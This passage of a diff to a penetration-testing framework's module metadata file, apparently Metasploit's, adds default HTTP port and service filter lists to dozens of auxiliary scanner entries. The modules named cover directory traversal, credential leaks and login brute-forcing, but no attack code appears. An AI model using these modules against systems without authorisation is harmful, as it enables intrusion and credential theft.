], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-05 00:15:04 +0000", "path": "/modules/auxiliary/scanner/http/glassfish_traversal.rb", @@ -16365,6 +22100,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/goahead_traversal.rb", @@ -16398,6 +22148,21 @@ "platform": "", "arch": "", "rport": 7181, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb", @@ -16429,6 +22194,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/host_header_injection.rb", @@ -16462,6 +22242,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb", @@ -16495,6 +22290,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb", @@ -16528,6 +22338,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb", @@ -16561,6 +22386,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb", @@ -16594,6 +22434,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb", @@ -16626,6 +22481,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb", @@ -16658,6 +22528,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb", @@ -16690,6 +22575,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb", @@ -16719,6 +22619,21 @@ "platform": "", "arch": "", "rport": 2381, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb", @@ -16750,6 +22665,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/http_header.rb", @@ -16779,6 +22709,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/http_hsts.rb", @@ -16808,6 +22753,23 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 8081, + 8444 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/http_login.rb", @@ -16839,6 +22801,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/http_put.rb", @@ -16870,6 +22847,21 @@ "platform": "", "arch": "", "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-06-25 17:24:13 +0000", "path": "/modules/auxiliary/scanner/http/http_sickrage_password_leak.rb", @@ -16902,6 +22894,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-02-13 06:20:57 +0000", "path": "/modules/auxiliary/scanner/http/http_traversal.rb", @@ -16931,6 +22938,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/http_version.rb", @@ -16960,6 +22982,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/httpbl_lookup.rb", @@ -16990,6 +23018,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-06-19 14:55:53 +0000", "path": "/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb", @@ -17019,6 +23062,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/iis_internal_ip.rb", @@ -17048,6 +23106,21 @@ "platform": "", "arch": "", "rport": 8086, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/influxdb_enum.rb", @@ -17077,6 +23150,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/infovista_enum.rb", @@ -17108,6 +23196,21 @@ "platform": "", "arch": "", "rport": 16992, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb", @@ -17137,6 +23240,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/ipboard_login.rb", @@ -17169,6 +23287,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/http/jboss_status.rb", @@ -17199,6 +23332,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/jboss_vulnscan.rb", @@ -17232,6 +23380,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/jenkins_command.rb", @@ -17261,6 +23424,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-01 15:32:32 +0000", "path": "/modules/auxiliary/scanner/http/jenkins_enum.rb", @@ -17290,6 +23468,22 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 8081 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/jenkins_login.rb", @@ -17319,6 +23513,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb", @@ -17348,6 +23557,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb", @@ -17378,6 +23602,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb", @@ -17407,6 +23646,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-31 11:37:10 +0000", "path": "/modules/auxiliary/scanner/http/joomla_pages.rb", @@ -17436,6 +23690,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/joomla_plugins.rb", @@ -17465,6 +23734,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/joomla_version.rb", @@ -17495,6 +23779,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/kodi_traversal.rb", @@ -17525,6 +23824,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/linknat_vos_traversal.rb", @@ -17558,6 +23872,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb", @@ -17591,6 +23920,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb", @@ -17620,6 +23964,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/lucky_punch.rb", @@ -17653,6 +24012,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb", @@ -17682,6 +24056,21 @@ "platform": "", "arch": "", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb", @@ -17712,6 +24101,21 @@ "platform": "", "arch": "", "rport": 6060, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb", @@ -17744,6 +24148,21 @@ "platform": "", "arch": "", "rport": 6060, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb", @@ -17775,6 +24194,21 @@ "platform": "", "arch": "", "rport": 6262, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb", @@ -17808,6 +24242,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb", @@ -17839,6 +24288,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb", @@ -17868,6 +24332,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/mod_negotiation_brute.rb", @@ -17897,6 +24376,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb", @@ -17931,6 +24425,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb", @@ -17968,6 +24477,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-16 15:13:23 +0000", "path": "/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb", @@ -17997,6 +24521,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/mybook_live_login.rb", @@ -18029,6 +24568,21 @@ "platform": "", "arch": "", "rport": 8087, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/netdecision_traversal.rb", @@ -18061,6 +24615,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb", @@ -18094,6 +24663,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/nginx_source_disclosure.rb", @@ -18124,6 +24708,21 @@ "platform": "", "arch": "", "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb", @@ -18154,6 +24753,22 @@ "platform": "", "arch": "", "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 3037 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb", @@ -18186,6 +24801,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/novell_mdm_creds.rb", @@ -18215,6 +24845,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb", @@ -18244,6 +24889,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/octopusdeploy_login.rb", @@ -18274,6 +24934,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/open_proxy.rb", @@ -18303,6 +24978,21 @@ "platform": "", "arch": "", "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/openmind_messageos_login.rb", @@ -18337,6 +25027,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/options.rb", @@ -18369,6 +25074,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb", @@ -18401,6 +25121,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb", @@ -18430,6 +25165,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/oracle_ilom_login.rb", @@ -18459,6 +25209,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/owa_ews_login.rb", @@ -18488,6 +25244,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb", @@ -18525,6 +25296,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-02-23 13:16:41 +0000", "path": "/modules/auxiliary/scanner/http/owa_login.rb", @@ -18554,6 +25340,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-24 23:21:59 +0000", "path": "/modules/auxiliary/scanner/http/phpmyadmin_login.rb", @@ -18583,6 +25384,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/pocketpad_login.rb", @@ -18612,6 +25428,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb", @@ -18641,6 +25472,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/radware_appdirector_enum.rb", @@ -18671,6 +25517,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb", @@ -18700,6 +25561,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/rails_mass_assignment.rb", @@ -18731,6 +25607,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb", @@ -18760,6 +25651,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/replace_ext.rb", @@ -18790,6 +25696,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb", @@ -18819,6 +25740,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/rfcode_reader_enum.rb", @@ -18850,6 +25786,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/rips_traversal.rb", @@ -18880,6 +25831,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 